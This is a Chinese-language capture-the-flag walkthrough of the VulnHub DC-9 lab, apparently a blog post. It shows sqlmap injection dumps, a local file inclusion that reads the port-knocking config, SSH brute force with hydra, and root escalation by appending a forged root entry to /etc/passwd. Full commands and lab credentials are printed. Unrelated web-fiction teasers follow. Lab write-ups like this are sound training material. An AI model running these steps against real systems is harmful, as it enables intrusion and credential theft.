Vulnhub靶机:DC-9

标签SQL注入本地文件包含LFI端口敲门hydra爆破linux提权

0x00 环境准备

下载地址:https://www.vulnhub.com/entry/dc-9,412/
flag数量:1
攻击机:kali
攻击机地址:192.168.1.31
靶机描述:

DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

0x01 信息搜集

1.探测靶机地址

命令:arp-scan -l

靶机地址192.168.1.38

2.探测靶机开放端口

命令:nmap -sV -p- 192.168.1.38

开放了22和80端口,但是22端口被过滤了,那就先看一下80端口

插件没有识别到web指纹。

0x02 SQL注入

在search菜单下有个提交框,说不定存在POST注入

放到sqlmap里跑一下,命令:sqlmap -u http://192.168.1.38/results.php --data "search=1" --batch -v 3 --level 3 --dbs

果然有注入,查询到了3个数据库,其中一个是系统自带的,我们跑一下剩下两个。

1.Staff数据库

命令:sqlmap -u http://192.168.1.38/results.php --data "search=1" --batch -v 3 --level 3 -D Staff --tables

查看数据表,命令:

StaffDetails表:
sqlmap -u http://192.168.1.38/results.php --data "search=1" --batch -v 3 --level 3 -D Staff -T StaffDetails --columns

Users表:
sqlmap -u http://192.168.1.38/results.php --data "search=1" --batch -v 3 --level 3 -D Staff -T Users --dump

StaffDetails表:

Users表:

看密码的加密方式应该是md5,查一下值

在staff表中拿到了admin的登录密码admin \ transorbital1

2.users数据库

命令:sqlmap -u http://192.168.1.38/results.php --data "search=1" --batch -v 3 --level 3 -D users --tables

命令:sqlmap -u http://192.168.1.38/results.php --data "search=1" --batch -v 3 --level 3 -D users -T UserDetails --dump

在UserDetails表中发现了很多账号密码,测试了几个都不能登录网站后台,那就使用admin登录吧,这几组账号密码先保存起来后面可能会用到。

admin登录成功了

0x03 本地文件包含LFI

使用admin登录后,页面上有一句提示(用红框框起来了),可能存在文件包含漏洞,fuzz一下,这里猜测文件参数是file

已经跑出来了

看样子是相对路径包含,不能用绝对路径。

知道了是相对路径,那就再跑一下其他文件

0x04 端口敲门

端口敲门

个人理解:端口敲门服务,即:knockd服务,是为了加强SSH的安全性而设计的。在正常情况下,黑客如果可以扫描到服务器的22端口是开放状态,那么就可以对该端口进行爆破,这样22端口是不安全的。在配置了knockd服务情况下,22端口默认是关闭的,knockd服务会侦听以太网或其他可用接口上的所有流量,等待特殊序列的端口命中(port-hit),当特殊序列的端口命中时,那么SSH所在的22端口就会被打开。

举个例子:假如knockd服务中定义了如下三个端口:4444、6666和7777为特殊序列的端口。在默认情况下,22端口是关闭的,当我们依次访问了这三个自定义的端口后,22端口就会自动开启。这样,只有知道自定义端口的人才能够访问22端口,黑客如果不知道自定义端口就无法开启22端口。

我们刚才已经爆破出/etc/knockd.conf文件了,现在看一下/etc/knockd.conf文件中的自定义端口

有3个自定义端口,分别是:7469,8475,9842
依次访问这三个端口就可以打开SSH服务了,命令:

nmap -p 7469 192.168.1.38
nmap -p 8475 192.168.1.38
nmap -p 9842 192.168.1.38

现在看一下ssh端口,命令:nmap -p 22 192.168.1.38

开放了,这里敲门我敲了半天,甚至还重启了一次靶机,最后突然就敲开了,玄学。

0x05 hydra爆破SSH

刚才sql注入的时候,拿到了很多用户名和密码,把它们分别保存。

然后使用hydra进行ssh爆破。命令:hydra -L user.txt -P pass.txt -t 10 ssh://192.168.1.38

爆破出来3个账号:chandlerb \ UrAG0D!joeyt \ Passw0rdjanitor \ Ilovepeepee
分别登陆这三个用户,在janitor用户下发现了隐藏文件,输入ls无结果,输入ls -la发现了文件。

这个文件看起来是一个存放密码的文件,将密码复制到刚才的密码pass.txt中,再次使用hydra进行爆破

爆破出了一个新的账号:fredf \ B4-Tru3-001

0x06 提权

使用新的账号可以使用sudo进行权限枚举

这里发现fred用户在NOPASSWD的情况下可以使用root权限运行这个test文件,尝试运行,发现它是一个python文件,查找test.py文件

查看test.py文件

该文件需要传入三个参数,这三个参数都是文件,传入三个参数后,会读取第二个文件,然后将第二个文件的内容追加到第三个文件里。
既然这样,我们就可以利用这个程序向/etc/passwd文件后追加一个拥有root权限的账户,也就是说把/etc/passwd文件设置为第三个参数,而第二个参数由我们自己创建,这个文件里是拥有root权限账户的信息,第一个参数随便写一个就好。

我们先使用openssl来创建第二个参数文件中的内容,
命令:openssl passwd -1 -salt dn 111111
这条命令的意思是创建一个用户名为dn,密码为111111的用户

-1 的意思是使用md5加密算法
-salt 自动插入一个随机数作为文件内容加密

生成后,根据/etc/passwd的格式,把它修改一下,然后存在靶机中的一个文件里,这个文件就是参数2
修改后的值:dn:$1$dn$af67d2P6bAKTKU2Y5vwMV0:0:0::/root:/bin/bash

最后,调用test.py进行提权

flag在/root下

由于我不会每天都登录简书,所以有什么私信或者评论我都不能及时回复,如果想要联系我最好给我发邮件,邮箱:Z2djMjUxMTBAMTYzLmNvbQ==,如果发邮件请备注“简书”


参考链接:

1.『VulnHub系列』DC: 9-Walkthrough
2.记一次vulnhub|渗透测试 DC-9
3.vulnhub靶机DC-9渗透测试
4.保护 SSH 的三把锁

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 203,324评论 5 476
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 85,303评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 150,192评论 0 337
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,555评论 1 273
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,569评论 5 365
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,566评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,927评论 3 395
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,583评论 0 257
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,827评论 1 297
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,590评论 2 320
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,669评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,365评论 4 318
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,941评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,928评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,159评论 1 259
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,880评论 2 349
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,399评论 2 342